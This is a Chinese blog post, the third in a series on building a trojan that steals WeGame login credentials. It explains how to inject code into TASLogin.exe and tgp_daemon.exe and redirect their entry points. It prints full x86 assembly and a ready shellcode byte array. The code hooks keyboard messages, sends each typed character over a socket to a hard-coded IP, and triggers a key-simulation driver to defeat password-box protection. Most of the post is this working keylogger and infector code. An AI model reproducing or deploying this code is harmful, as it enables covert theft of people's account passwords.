木马盗号《三》
背景:
上一篇 WeGame盗号木马之旅(二) 我们实现了键盘按键模拟驱动的开发,这篇我们实现下具体注入代码的编写。
目标:
具体的注入代码编写。实现账号获取和密码获取。
实现:
下面放两张图形象的说明我们这篇具体是写什么代码:
上面就是具体的感染过程。这一篇我们写的注入代码就是上面橙色框内的代码,后面我们会写InfectiveVirus.exe的代码,用于实现怎么把这次实现的代码写到目标EXE,并且让他像正常工作一样,但是关键时刻会向服务器发送信息。我们的注入代码可以当作就像是原本就运行在目标EXE里面的代码一样。对于获取账号消息,我们可以直接首先设置一个局部钩子(https://msdn.microsoft.com/zh-cn/library/windows/desktop/ms644990(v=vs.85).aspx)(https://blog.csdn.net/rankun1/article/details/50973190),然后设置回掉函数捕获消息,在捕获消息后开启一个线程用来创建套接字,然后发送消息到服务器。密码端的也差不多,只是在钩子的回掉函数里面多加一个WM_LBUTTONDOWN消息的判断,当单击输入密码框时,我们发送命令给上文写到驱动。让他快速模拟按键产生翻译密码本,这个时间很快,一般用户不会察觉。然后当用户输入密码时,就向捕获账号一样,开启一个线程然后发消息就OK了。
我假装读者已经基本了解了PE结构。那么就会明白,我们需要注入的代码其实就是二进制,而不是我们在VS上面写的代码,也不是汇编。当然汇编和二进制就是一样的,可以直接转换。下面我上一张图帮助大家理解具体细节:
上面我们只是把代码指令(二进制)和一些参数(比如函数调用需要的字符串,函数调用地址等等)注入到目标EXE,并没有修改入口地址。下图是最终版:
这样程序会在正式执行自己的代码前首先运行我们的代码,然后我在jmp 到原来的入口点执行本来程序的代码就OK了 O(∩_∩)O。至于这些代码的注入和入口点的修改会在开发 InfectiveVirus.exe是介绍,这些是他的工作。
在说明一点,开发注入的代码,最好直接用汇编语言写。当然也可以首先用C代码实现,然后参考反汇编后的代码在写汇编(比较适合新手-。-!!)。但是最终需要写成汇编,然后转换成二进制。最后通过一个char数组保存二进制到InfectiveVirus.exe。然后直接memcpy复制二进制到目标EXE即可。如图是我写好的二进制代码char 数组:
其实就是对应的汇编指令的机器码。
还有一点说明-。-。。。。 这个汇编代码的编写不像一般的汇编直接可以调用函数,比如 call printf("我最帅!") 。我们知道call 指令其实把EIP设置为了printf函数的指令第一条地址,即 call printf("我最帅!") 其实会被编译器解释成 call 0X66666666(随便写的一个地址)。这个地址一般保存在PE结构的导入表(https://baijiahao.baidu.com/s?id=1590821448124371294&wfr=spider&for=pc)中。简单点讲,导入表保存了这个程序需要使用的所有API 入口地址。但是我们的代码是后期注入的,不可能直接 call printf("我最帅!") -。-///。所以我们需要获得我们注入代码需要使用的函数地址,我把这些地址保存在注入代码的数据区(参见上面某图)。然后直接call 0X66666666(随便写) 来调用printf 这个函数。同时一些需要的参数比如 "我最帅"(举个例子)我也保存到注入代码的参数区。但是我们怎么获取我们需要的函数地址呢?我们可以首先获得LoadLibraryA和GetProcAddress(https://blog.csdn.net/aidem_brown/article/details/50625482)这两个函数地址,然后就可以获取任何模块导出表(https://blog.csdn.net/evi10r/article/details/7216467)中函数的地址了。那么我们怎么获得这两个函数地址呢?上面两个函数在kernel32.dll里面,一般程序都会加载这个DLL。我们可以这么做:
一、获得kernel32.dll加载基质。
二、解析kernel32.dll导出表
(细节请参考《计算机病毒揭秘与对抗》和https://blog.csdn.net/mynote/article/details/387221?locationNum=10)
然后我们就可以在汇编里面通过这两个函数获取我们需要使用函数的地址了。
最后说下参数的问题,函数调用需要的参数我们也需要写到目标EXE里面,因为比如当调用 call printf("我最帅!")时。push "我最帅" 其实是push 0X88888888("我最帅"字符串的入口地址) 所有我们需要准确的计算每一个字符串的地址,正常程序中这种苦活都是编译器连接器完成的,但是我们是"外来户",就没有这个福利了O(∩_∩)O//// 下面提一下两个注入代码的指令区和参数区的入口地址:
tgp_daemon.exe注入代码指令入口地址:0x00570000
tgp_daemon.exe注入代码参数入口地址:0x00571000
TASLogin.exe注入代码指令入口地址:0x004F0000
TASLogin.exe注入代码参数入口地址:0x004F1000
因为我开辟的空间大小是0X2000。所以开头0X1000写指令,后面0X1000放参数。下面看下这两个EXE的PE结构大家就会明白了。 tgp_daemon.exe PE结构图:
ImageBase是加载基址,SizeOfImage是整个PE文件内存大小。相加就是0X00570000,我的数据是加到原来EXE尾部的。下面的TASLogin.exe 也是同理。 TASLogin.exe PE结构图:
下面是我们需要的参数,注释是他们的相对地址: 代码顺序一排一序。
1char cBuffer[48] = { 0 };//0
2char* pUser32 = "C:\\Windows\\System32\\user32.dll";//30
char* pWS2_32 = "C:\\Windows\\System32\\Ws2_32.dll";//60
char* pLoadLibrary = "LoadLibraryA";//90
char* pGetProcAddress = "GetProcAddress";//C0
char* pGetCurrentThreadId = "GetCurrentThreadId";//F0
char* pSetWindowsHookEx = "SetWindowsHookExA";//120
char* pCreateThread = "CreateThread";//150
char* pCallNextHookEx = "CallNextHookEx";//180
char* pWSAStartup = "WSAStartup";//1B0
char* psocket = "socket";//1E0
char* phtons = "htons";//210
char* pIP = "192.168.1.3";//240
char* pinet_addr = "inet_addr";//270
char* pconnect = "connect";//2A0
char* psend = "send";//2D0
char* pclosesocket = "closesocket";//300
char* pWSACleanup = "WSACleanup";//330
int iNamesNum;//360
HHOOK gHook;//364
PBYTE pKernalBaseMem = NULL;//368
HANDLE hUser32Handle = NULL;//36C
HANDLE hWS2_32Handle = NULL;//370
WORD* pNameOrdinalsTable;//374
DWORD* pAddressOfName;//378
DWORD* pAddressOfFunction;//37C
DWORD dwLoadLibrary = NULL;//380
DWORD dwGetProcAddress = NULL;//384
PROC procGetCurrentThreadId = NULL;//388
PROC procSetWindowsHookEx = NULL;//38C
PROC procCreateThread = NULL;//390
PROC procCallNextHookEx = NULL;//394
PROC procWSAStartup = NULL;//398
PROC procsocket = NULL;//39C
PROC prochtons = NULL;//3A0
PROC procinet_addr = NULL;//3A4
PROC procconnect = NULL;//3A8
PROC procsend = NULL;//3AC
PROC procclosesocket = NULL;//3B0
PROC procWSACleanup = NULL;//3B4
//////////////
WCHAR pLinkName[] = L"\\\\.\\TROJAN_LINK";//3B8
char pCreateFile[] = "CreateFileW";//3E8
char pDeviceIoControl[] = "DeviceIoControl";//418
PROC procCreateFile = NULL;//448
PROC procDeviceIoControl = NULL;//44C
int temp;//450
PROC 保存的是函数地址 char是函数名字,还有一些int用于临时用。 怎么在汇编调用这些参数?下面举个例子:比如我要push pCreateFile ,在tgp_daemon.exe 的注入代码里面我要这么写 push 0X005713E8 (0X00571000+0X3E8)即参数基址加相对偏移。
下面的代码实现获取LoadLibrary和GetProcAddress函数地址并且获取需要函数地址功能,最后设置消息钩子并返回原始入口点。我以后例子只举TASLogin.exe 注入代码的编写,tgp_daemon.exe 的注入代码类似我就不说了。下面代码第一行是第一条指令的地址,也就是说从这个地址开始写机器码的。-。-///
0x004F0000:
mov eax,dword ptr fs:[00000030h];////获得PEB结构
mov eax,dword ptr [eax+0Ch];//+0x00c获得 Ldr :_PEB_LDR_DATA
mov eax,dword ptr [eax+0Ch];//+0x00c 获得第一个 InLoadOrderModuleList : _LIST_ENTRY
mov eax,dword ptr [eax];//+0x000 下一个节点 InLoadOrderLinks : _LIST_ENTRY
mov eax,dword ptr [eax];//+0x000 下一个节点 InLoadOrderLinks : _LIST_ENTRY 此时获取到KERNEL32.DLL的_LDR_DATA_TABLE_ENTRY结构
mov eax,dword ptr [eax+18h];//+0x018 获取KERNEL32.DLL的基址 DllBase : Ptr32 Void
mov dword ptr [0X368 +0X004F1000],eax;//pKernalBase
mov eax,dword ptr [eax+3Ch];//+0x03c e_lfanew
mov ebx,dword ptr [0X368 +0X004F1000]
add eax,ebx;//获得PE头 即_IMAGE_NT_HEADERS结构
add ebx,dword ptr [eax+78h];//+0x018 OptionalHeader +0x060 DataDirectory+0x000 VirtualAddress 获得导出表的虚拟地址
mov eax,dword ptr [ebx+14h];//获取NumberOfFunction
mov dword ptr [0X360 +0X004F1000],eax;//iNameNUm
mov ecx,dword ptr [0X368 +0X004F1000]
add ecx,dword ptr [ebx+24h];//获取 pNameOrdinalsTable
mov dword ptr [0X374 +0X004F1000],ecx;//pNameOrdinals
mov ecx,dword ptr [0X368 +0X004F1000]
add ecx,dword ptr [ebx+20h];//获得 pAddressOfName
mov dword ptr [0X378 +0X004F1000],ecx;//pAddress
mov ecx,dword ptr [0X368 +0X004F1000]
add ecx,dword ptr [ebx+1Ch];//获得 pAddressOfFunction
mov dword ptr [0X37C +0X004F1000],ecx;//Function
;//获取LoadLibrary和GetProcAddress函数地址,需要对比名字链里面的函数名字是否符合,然后获得地址
push esi;//寄存器不够用,先拿这个过来用用,放函数名字字符串的首地址用于遍历
push edi;//放目标函数名字字符串的首地址用于遍历
mov edx,0;//初始化总的有名字的导出函数数目
mov edi,dword ptr [0X378 +0X004F1000];//t1
mov esi,dword ptr [0X368 +0X004F1000]
add esi,dword ptr [edi+edx*4];//获得名字字符串地址用于保存
mov edi, 0X004F1090;//字符串 LoadLibrary
mov ebx,0;//初始化LoadLibrary字符比较次数
mov ecx,0;//初始化GetProcAddress字符比较次数
mov ah,byte ptr [esi+ebx];//t2 获取一个字节
mov al,byte ptr [edi+ebx]
cmp ah,al;//比较这个字节
jne 0x004F00BA;//jump T3
inc ebx;//指向下一个字符
cmp ebx,0Dh;//判断是否到了字符串尾
jne 0x004F0087;//jump T2
mov ecx,dword ptr [0X374 +0X004F1000]
movzx ecx,word ptr [ecx+edx*2];//获得函数地址表序号
mov edi,dword ptr [0X37C +0X004F1000]
mov edi,dword ptr [edi+ecx*4];//获得LoadLibrary的地址
mov dword ptr [0X380 +0X004F1000],edi;//保存结果
mov ecx,0;//初始化GetProcAddress字符比较次数
mov edi, 0X004F10C0 ;//字符串 t3 GetProcAddress
mov ah,byte ptr [esi+ecx];//获取一个字节
mov al,byte ptr [edi+ecx]
cmp ah,al;//比较这个字节
jne 0x004F00ED;//jump T4
inc ecx;//指向下一个字符
cmp ecx,0Eh;//判断是否到了字符串尾
jne 0x004F00BA;//jump T3
mov esi,dword ptr [0X374 +0X004F1000]
movzx esi,word ptr [esi+edx*2];//获得函数地址表序号
mov edi,dword ptr [0X37C +0X004F1000]
mov edi,dword ptr [edi+esi*4];//获得GetProcAddress的地址
mov dword ptr [0X384 +0X004F1000],edi;//保存结果
mov eax,dword ptr [0X380 +0X004F1000];//t4
cmp eax,0;//判断是否读取到了两个函数的地址
je 0x004F0105;//jump T5 只要有一个没有就继续寻找
mov eax,dword ptr [0X384 +0X004F1000]
cmp eax,0
je 0x004F0105;//jump T5
jmp 0x004F0112;//jump T6 都读取到就退出
inc edx;//t5
cmp edx,dword ptr [0X360 +0X004F1000]
jne 0x004F0066;//jump TI
pop edi;//t6 恢复环境
pop esi
mov eax,dword ptr [0X368 +0X004F1000];//获取需要函数地址
mov ebx,dword ptr [0X380 +0X004F1000]
add ebx,eax
mov dword ptr [0X380 +0X004F1000],ebx
mov ebx,dword ptr [0X384 +0X004F1000]
add ebx,eax
mov dword ptr [0X384 +0X004F1000],ebx
push 0X004F1030;//参数 User32
call dword ptr [0X380 +0X004F1000]
mov dword ptr [0X36C +0X004F1000],eax
push 0X004F1060;//参数 WS2
call dword ptr [0X380 +0X004F1000]
mov dword ptr [0X370 +0X004F1000],eax
push 0X004F10F0;//参数 GetCurrrentThreadId
push [0X368+0X004F1000]
call [0X384+0X004F1000]
mov [0X388+0X004F1000],eax;//保存
push 0X004F1120;//参数 SetWindowsHookEx
push [0X36C+0X004F1000]
call [0X384+0X004F1000]
mov [0X38C+0X004F1000],eax;//保存
push 0X004F1150;//参数 CreateThread
push [0X368+0X004F1000]
call [0X384+0X004F1000]
mov [0X390+0X004F1000],eax;//保存
push 0X004F1180;//参数 CallNextHookEx
push [0X36C+0X004F1000]
call [0X384+0X004F1000]
mov [0X394+0X004F1000],eax;//保存
push 0X004F11B0;//参数 WSAStartup
push [0X370+0X004F1000]
call [0X384+0X004F1000]
mov [0X398+0X004F1000],eax;//保存
push 0X004F11E0;//参数 socket
push [0X370+0X004F1000]
call [0X384+0X004F1000]
mov [0X39C+0X004F1000],eax;//保存
push 0X004F1210;//参数 htons
push [0X370+0X004F1000]
call [0X384+0X004F1000]
mov [0X3A0+0X004F1000],eax;//保存
push 0X004F1270;//参数 inet_addr
push [0X370+0X004F1000]
call [0X384+0X004F1000]
mov [0X3A4+0X004F1000],eax;//保存
push 0X004F12A0;//参数 connect
push [0X370+0X004F1000]
call [0X384+0X004F1000]
mov [0X3A8+0X004F1000],eax;//保存
push 0X004F12D0;//参数 send
push [0X370+0X004F1000]
call [0X384+0X004F1000]
mov [0X3AC+0X004F1000],eax;//保存
push 0X004F1300;//参数 closesocket
push [0X370+0X004F1000]
call [0X384+0X004F1000]
mov [0X3B0+0X004F1000],eax;//保存
push 0X004F1330;//参数 WSAClenaup
push [0X370+0X004F1000]
call [0X384+0X004F1000]
mov [0X3B4+0X004F1000],eax;//保存
push 0X004F13E8;//参数 CreateFile
push [0X368+0X004F1000]
call [0X384+0X004F1000]
mov [0X448+0X004F1000],eax;//保存
push 0X004F1418;//参数 DeviceIoControl
push [0X368+0X004F1000]
call [0X384+0X004F1000]
mov [0X44C+0X004F1000],eax;//保存
call dword ptr ds:[0X388+0X004F1000]
push eax;//获得线程ID压入
push 0x0
push 0x004F0300;//CALLBACK 地址
push 0x3
call dword ptr ds:[0X38C+0X004F1000];//设置钩子
mov [0X364+0X004F1000],eax;//保存返回的HOOK
jmp 0x00420148;//跳回原来程序的入口点下面是钩子回掉函数的汇编主要判断是不是WM_CHAR消息,如果是就开启线程发送消息。还有就是是不是左键按下,如果是就开启线程进行按键模拟获取密码本(tgp_daemon.exe 注入代码不需要这个):
0x004F0300:
push ebp
mov ebp,esp
sub esp,0C0h
push ebx
push esi
push edi
lea edi,[ebp-0C0h]
mov ecx,30h
mov eax,0CCCCCCCCh
rep stos dword ptr es:[edi]
mov eax,dword ptr [ebp+0x10];//获得pMsg地址
mov ebx,dword ptr [eax+4];//获得message
cmp ebx,102h;//WM_CHAR 是否是字符消息
jne 0x004F0351;//jump T1
mov al, [eax+0x8];//获得wParam
mov byte ptr [0X004F1000+0X0],al;//保存数据到缓冲区
push 0
push 0
lea eax,[0X004F1000+0X0];//获取缓冲区地址
push eax
push 0x004F03C0;//入口线程 这个线程开启套接字,发送数据
push 0
push 0
call dword ptr [0X004F1000+0X390];//CreateThread
mov eax,dword ptr [ebp+0x10];//获得pMsg地址
mov ebx,dword ptr [eax+4];//获得message T1
cmp ebx,201h;//WM_LBUTTONDOWN 是否左键单击
jnz 0x004F0374;//jump T3
push 0
push 0
push 0
push 0x004F0480;//入口线程 这个线程执行键盘驱动模拟
push 0
push 0
call dword ptr [0X004F1000+0X390];//CreateThread
push dword ptr [ebp+0x10] ;//T3
push dword ptr [ebp+0xC]
push dword ptr [ebp+0x8]
push dword ptr [0X004F1000+0x364];//gHook
call dword ptr [0X004F1000+0x394];//CallNextHookEx
pop edi
pop esi
pop ebx
mov esp,ebp
pop ebp
ret 0Ch下面是创建套接字和发送消息的汇编:
0x004F03C0:
push ebp
mov ebp,esp
sub esp,40h
push ebx
push esi
push edi
lea eax,[ebp-1D0h]
push eax
push 202h
call dword ptr [0X004F1000+0x398];//WSAStartup
push 0
push 1
push 2
call dword ptr [0X004F1000+0X39C];//socket
mov dword ptr [ebp-8],eax;//保存局部socket
mov eax,2
mov word ptr [ebp-20h],ax
push 1A0Ah
call dword ptr [0X004F1000+0X3A0];//htons
mov word ptr [ebp-1Eh],ax
push 0X004F1240;//IP
call dword ptr [0X004F1000+0X3A4];//inet_addr
mov dword ptr [ebp-1Ch],eax
push 10h;//socketAddr大小
lea eax,[ebp-20h];//socketAddr地址
push eax
mov eax,dword ptr [ebp-8]
push eax
call dword ptr [0X004F1000+0X3A8];//connect
cmp eax,0
jne 0X004F0437;//jump
push 0
push 1;//发送数据大小
push dword ptr [ebp+8];//缓冲区地址
mov eax,dword ptr [ebp-8]
push eax
call dword ptr [0X004F1000+0x3AC];//send
mov eax,dword ptr [ebp-8];//t1
push eax
call dword ptr [0X004F1000+0X3B0];//closesocket
call dword ptr [0X004F1000+0X3B4];//WSAClenaup
pop edi
pop esi
pop ebx
mov esp,ebp
pop ebp
ret 4下面是启动驱动模拟按键的汇编(tgp_daemon.exe 的注入代码不需要):
0x004F0480:
push ebp
mov ebp,esp
sub esp,0C0h
push ebx
push esi
push edi
push 0
push 80h
push 3
push 0
push 3
push 0xC0000000
push 0X004F13B8;//驱动符号名
call [0X004F1000+0X448];//CreateFile 打开驱动
push 0
push 0x004F1450;//驱动信息返回地址
push 0
push 0
push 0
push 0
push 0
push eax
call [0X004F1000+0X44C];//DeviceIoControl 发送命令启动驱动
pop edi
pop esi
pop ebx
mov esp,ebp
pop ebp
ret 4写完了上面的汇编还没完,我们还需要把他变成机器码如下:
//注入代码(TASLogin.exe)
char shellcode2[] = {
0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x4F,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
0x13,0x4F,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x4F,
0x00,0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x4F,0x00,
0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x4F,0x00,0x8B,
0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x4F,0x00,0x56,0x57,
0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x4F,0x00,0x8B,0x35,0x68,0x13,
0x4F,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x4F,0x00,0xC7,0xC3,0x00,0x00,0x00,
0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x4F,
0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x4F,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
0x80,0x13,0x4F,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x4F,0x00,
0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x4F,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
0x7C,0x13,0x4F,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x4F,0x00,0x8B,0x05,0x80,
0x13,0x4F,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x4F,0x00,0x83,0xF8,
0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x4F,0x00,0x0F,0x85,0x54,0xFF,
0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x4F,0x00,0x8B,0x1D,0x80,0x13,0x4F,0x00,
0x03,0xD8,0x89,0x1D,0x80,0x13,0x4F,0x00,0x8B,0x1D,0x84,0x13,0x4F,0x00,0x03,0xD8,
0x89,0x1D,0x84,0x13,0x4F,0x00,0x68,0x30,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,0x4F,
0x00,0x89,0x05,0x6C,0x13,0x4F,0x00,0x68,0x60,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,
0x4F,0x00,0x89,0x05,0x70,0x13,0x4F,0x00,0x68,0xF0,0x10,0x4F,0x00,0xFF,0x35,0x68,
0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x88,0x13,0x4F,0x00,0x68,
0x20,0x11,0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,
0x89,0x05,0x8C,0x13,0x4F,0x00,0x68,0x50,0x11,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,
0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x90,0x13,0x4F,0x00,0x68,0x80,0x11,
0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,
0x94,0x13,0x4F,0x00,0x68,0xB0,0x11,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,
0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x98,0x13,0x4F,0x00,0x68,0xE0,0x11,0x4F,0x00,
0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x9C,0x13,
0x4F,0x00,0x68,0x10,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,
0x13,0x4F,0x00,0x89,0x05,0xA0,0x13,0x4F,0x00,0x68,0x70,0x12,0x4F,0x00,0xFF,0x35,
0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xA4,0x13,0x4F,0x00,
0x68,0xA0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,
0x00,0x89,0x05,0xA8,0x13,0x4F,0x00,0x68,0xD0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,
0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xAC,0x13,0x4F,0x00,0x68,0x00,
0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,
0x05,0xB0,0x13,0x4F,0x00,0x68,0x30,0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,
0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xB4,0x13,0x4F,0x00,0x68,0xE8,0x13,0x4F,
0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x48,
0x14,0x4F,0x00,0x68,0x18,0x14,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,
0x84,0x13,0x4F,0x00,0x89,0x05,0x4C,0x14,0x4F,0x00,0xFF,0x15,0x88,0x13,0x4F,0x00,
0x50,0x6A,0x00,0x68,0x00,0x03,0x4F,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,0x4F,0x00,
0x89,0x05,0x64,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,
0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,0x00,0xE9,0x78,0xFE,0xF2,0xFF,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
0x08,0x88,0x05,0x00,0x10,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x4F,
0x00,0x50,0x68,0xC0,0x03,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,
0x00,0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x01,0x02,0x00,0x00,0x75,0x15,0x6A,
0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,
0x90,0x13,0x4F,0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,
0x13,0x4F,0x00,0xFF,0x15,0x94,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,
0x0C,0x00,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x01,0x6A,
0x02,0xFF,0x15,0x9C,0x13,0x4F,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
0x66,0x89,0x45,0xE0,0x68,0x0B,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x4F,0x00,0x66,
0x89,0x45,0xE2,0x68,0x40,0x12,0x4F,0x00,0xFF,0x15,0xA4,0x13,0x4F,0x00,0x89,0x45,
0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x4F,
0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
0x50,0xFF,0x15,0xAC,0x13,0x4F,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x4F,
0x00,0xFF,0x15,0xB4,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x6A,0x00,0x68,0x80,
0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x68,0xB8,
0x13,0x4F,0x00,0xFF,0x15,0x48,0x14,0x4F,0x00,0x6A,0x00,0x68,0x54,0x14,0x4F,0x00,
0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x50,0xFF,0x15,0x4C,0x14,0x4F,
0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x90,0x90,0x90,0x90,0x90,0x90
};本篇结语:
别看我现在写起来很轻松,背后说多了都是泪啊-。-、、、。汇编转机器码可以使用OllyDbg里面的一个插件NonaWrite完成。
THE END
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-02-16,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
